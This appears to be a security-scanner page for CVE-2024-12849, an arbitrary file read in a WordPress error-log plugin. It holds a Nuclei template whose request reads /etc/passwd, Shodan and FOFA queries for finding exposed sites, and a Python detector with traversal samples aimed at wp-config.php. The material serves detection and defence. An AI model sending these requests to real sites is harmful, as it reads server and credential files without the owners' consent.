Error Log Viewer By WP Guru <= 1.0.1.3 - Missing Authorization to Arbitrary File Read
ID: CVE-2024-12849
Severity: high
Author: s4e-io
Tags: cve,cve2024,wordpress,wp,wp-plugin,error-log-viewer-wp,lfi
Description
The Error Log Viewer By WP Guru plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 1.0.1.3 via the wp_ajax_nopriv_elvwp_log_download AJAX action. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information.
YAML Source
id: CVE-2024-12849

info:
  name: Error Log Viewer By WP Guru <= 1.0.1.3 - Missing Authorization to Arbitrary File Read
  author: s4e-io
  severity: high
  description: |
    The Error Log Viewer By WP Guru plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 1.0.1.3 via the wp_ajax_nopriv_elvwp_log_download AJAX action. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information.
  reference:
    - https://github.com/RandomRobbieBF/CVE-2024-12849
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/57888e36-3a61-4452-b4ea-9db9e422dc2d?source=cve
    - https://nvd.nist.gov/vuln/detail/CVE-2024-12849
    - https://github.com/advisories/GHSA-899p-f2mf-g895
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-12849
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 2
    vendor: wp-guru
    product: error-log-viewer-wp
    framework: wordpress
    shodan-query: http.html:"wp-content/plugins/error-log-viewer-wp"
    fofa-query: body="wp-content/plugins/error-log-viewer-wp"
  tags: cve,cve2024,wordpress,wp,wp-plugin,error-log-viewer-wp,lfi

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "/wp-content/plugins/error-log-viewer-wp")'
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=elvwp_log_download&elvwp_error_log_download=1&elvwp_error_log=/etc/passwd

    matchers:
      - type: dsl
        dsl:
          - "regex('root:.*:0:0:', body)"
          - 'contains(content_type, "application/octet-stream")'
          - "status_code == 200"
        condition: and
# digest: 4b0a00483046022100907225c49a837e3f7e4f4471dd5cd29c5de2d4762df934f5568f3f8186beb2740221009d42f9eaff23860bc951957d067b292cd0c3e0cc42703668c26b424deebeaa04:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-12849.yaml"
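The second request in the template above is also what a defender should look for in traffic captured in front of the site. The following detection logic is an added example, not part of the Nuclei template or the plugin: it takes captured admin-ajax.php POSTs (a constructed sample in a method/path/body shape; real WAF or reverse-proxy audit logs will need their own parser) and flags elvwp_log_download calls whose elvwp_error_log parameter resolves outside the plugin's log directory. ALLOWED_LOG_DIR is an assumed placeholder, not the plugin's real path.

```python
from urllib.parse import parse_qs, unquote
import posixpath

# Assumed placeholder for where the plugin keeps its own log files;
# set this to the directory used on the deployment being monitored.
ALLOWED_LOG_DIR = "/var/www/html/wp-content/uploads/error-log-viewer-wp"

# Constructed sample of captured requests: (method, path, url-encoded body).
SAMPLE_REQUESTS = [
    ("POST", "/wp-admin/admin-ajax.php",
     "action=elvwp_log_download&elvwp_error_log_download=1&elvwp_error_log=/etc/passwd"),
    ("POST", "/wp-admin/admin-ajax.php",
     "action=elvwp_log_download&elvwp_error_log_download=1&elvwp_error_log=..%2F..%2F..%2Fwp-config.php"),
    ("POST", "/wp-admin/admin-ajax.php",
     "action=elvwp_log_download&elvwp_error_log_download=1"
     "&elvwp_error_log=/var/www/html/wp-content/uploads/error-log-viewer-wp/error.log"),
    ("POST", "/wp-admin/admin-ajax.php", "action=heartbeat&_nonce=abc"),
]


def check_request(path, body, allowed_dir=ALLOWED_LOG_DIR):
    """Return a reason string if the request abuses elvwp_log_download, else None."""
    if not path.endswith("/wp-admin/admin-ajax.php"):
        return None
    params = parse_qs(body, keep_blank_values=True)
    if params.get("action", [""])[0] != "elvwp_log_download":
        return None
    # parse_qs decoded one layer; decode again so double-encoded "../" is not missed.
    requested = unquote(params.get("elvwp_error_log", [""])[0])
    # Resolve relative names against the log directory, then normalise so that
    # "../" segments collapse before the containment check.
    candidate = requested if requested.startswith("/") else posixpath.join(allowed_dir, requested)
    resolved = posixpath.normpath(candidate)
    if resolved != allowed_dir and not resolved.startswith(allowed_dir + "/"):
        return f"elvwp_error_log resolves outside the log directory: {resolved}"
    return None


def scan(requests):
    """Run check_request over captured requests; return (index, reason) for each hit."""
    hits = []
    for i, (method, path, body) in enumerate(requests):
        if method != "POST":
            continue
        reason = check_request(path, body)
        if reason:
            hits.append((i, reason))
    return hits


if __name__ == "__main__":
    for i, reason in scan(SAMPLE_REQUESTS):
        print(f"request {i}: {reason}")
```

Because the containment check runs on the normalised path rather than on a "../" substring, an absolute path such as the template's /etc/passwd and an encoded traversal are caught by the same rule, while downloads of files inside the log directory pass.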